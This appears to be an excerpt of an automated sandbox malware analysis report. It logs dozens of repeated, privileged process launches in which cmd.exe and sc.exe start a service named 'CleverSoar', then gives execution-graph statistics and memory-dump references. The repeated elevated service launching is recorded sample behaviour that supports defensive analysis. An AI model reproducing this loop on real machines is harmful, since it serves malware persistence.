                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:30
                                                                                                              Start time:02:38:34
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:31
                                                                                                              Start time:02:38:34
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:32
                                                                                                              Start time:02:38:35
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:33
                                                                                                              Start time:02:38:35
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:34
                                                                                                              Start time:02:38:35
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:35
                                                                                                              Start time:02:38:35
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:36
                                                                                                              Start time:02:38:35
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:37
                                                                                                              Start time:02:38:35
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:38
                                                                                                              Start time:02:38:35
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 39
Start time: 02:38:35
Start date: 23/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd /c start sc start CleverSoar
Imagebase: 0x7ff6e5680000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 40
Start time: 02:38:35
Start date: 23/12/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: sc start CleverSoar
Imagebase: 0x7ff63d0a0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 41
Start time: 02:38:35
Start date: 23/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 42
Start time: 02:38:35
Start date: 23/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd /c start sc start CleverSoar
Imagebase: 0x7ff6e5680000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 43
Start time: 02:38:35
Start date: 23/12/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: sc start CleverSoar
Imagebase: 0x7ff63d0a0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 44
Start time: 02:38:35
Start date: 23/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 45
Start time: 02:38:35
Start date: 23/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd /c start sc start CleverSoar
Imagebase: 0x7ff6e5680000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 46
Start time: 02:38:35
Start date: 23/12/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: sc start CleverSoar
Imagebase: 0x7ff63d0a0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 47
Start time: 02:38:35
Start date: 23/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 48
Start time: 02:38:35
Start date: 23/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd /c start sc start CleverSoar
Imagebase: 0x7ff6e5680000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 49
Start time: 02:38:35
Start date: 23/12/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: sc start CleverSoar
Imagebase: 0x7ff63d0a0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 50
Start time: 02:38:35
Start date: 23/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 51
Start time: 02:38:36
Start date: 23/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd /c start sc start CleverSoar
Imagebase: 0x7ff6e5680000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 52
Start time: 02:38:36
Start date: 23/12/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: sc start CleverSoar
Imagebase: 0x7ff63d0a0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 53
Start time: 02:38:36
Start date: 23/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 54
Start time: 02:38:37
Start date: 23/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd /c start sc start CleverSoar
Imagebase: 0x7ff6e5680000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 55
Start time: 02:38:37
Start date: 23/12/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: sc start CleverSoar
Imagebase: 0x7ff63d0a0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 56
Start time: 02:38:37
Start date: 23/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 57
Start time: 02:38:37
Start date: 23/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd /c start sc start CleverSoar
Imagebase: 0x7ff6e5680000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 58
Start time: 02:38:37
Start date: 23/12/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:59
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:60
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:61
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:62
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:63
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:64
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:65
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:66
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:67
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:68
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:69
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:70
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:71
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:72
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:73
                                                                                                              Start time:02:38:37
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
Has exited:true

Target ID:74
Start time:02:38:37
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:75
Start time:02:38:37
Start date:23/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /c start sc start CleverSoar
Imagebase:0x7ff6e5680000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:76
Start time:02:38:38
Start date:23/12/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:sc start CleverSoar
Imagebase:0x7ff63d0a0000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:77
Start time:02:38:38
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:79
Start time:02:38:38
Start date:23/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /c start sc start CleverSoar
Imagebase:0x7ff6e5680000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:80
Start time:02:38:38
Start date:23/12/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:sc start CleverSoar
Imagebase:0x7ff63d0a0000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:81
Start time:02:38:38
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:82
Start time:02:38:38
Start date:23/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /c start sc start CleverSoar
Imagebase:0x7ff6e5680000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:83
Start time:02:38:38
Start date:23/12/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:sc start CleverSoar
Imagebase:0x7ff63d0a0000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:84
Start time:02:38:38
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:85
Start time:02:38:38
Start date:23/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /c start sc start CleverSoar
Imagebase:0x7ff6e5680000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:86
Start time:02:38:38
Start date:23/12/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:sc start CleverSoar
Imagebase:0x7ff63d0a0000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:87
Start time:02:38:38
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:88
Start time:02:38:38
Start date:23/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /c start sc start CleverSoar
Imagebase:0x7ff6e5680000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:89
Start time:02:38:38
Start date:23/12/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:sc start CleverSoar
Imagebase:0x7ff63d0a0000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:90
Start time:02:38:38
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:91
Start time:02:38:38
Start date:23/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /c start sc start CleverSoar
Imagebase:0x7ff7b4ee0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:92
Start time:02:38:38
Start date:23/12/2024
Path:C:\Windows\System32\sc.exe
Wow64 process (32bit):false
Commandline:sc start CleverSoar
Imagebase:0x7ff63d0a0000
File size:72'192 bytes
MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:93
Start time:02:38:38
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff75da10000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:94
Start time:02:38:38
Start date:23/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd /c start sc start CleverSoar
Imagebase:0x7ff6e5680000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Execution Graph

Execution Coverage: 1.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 5.1%
Total number of Nodes: 742
Total number of Limit Nodes: 8
APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp
• Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
• Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
Similarity
• API ID: _strlen
• String ID: HR^
• API String ID: 4218353326-1341859651
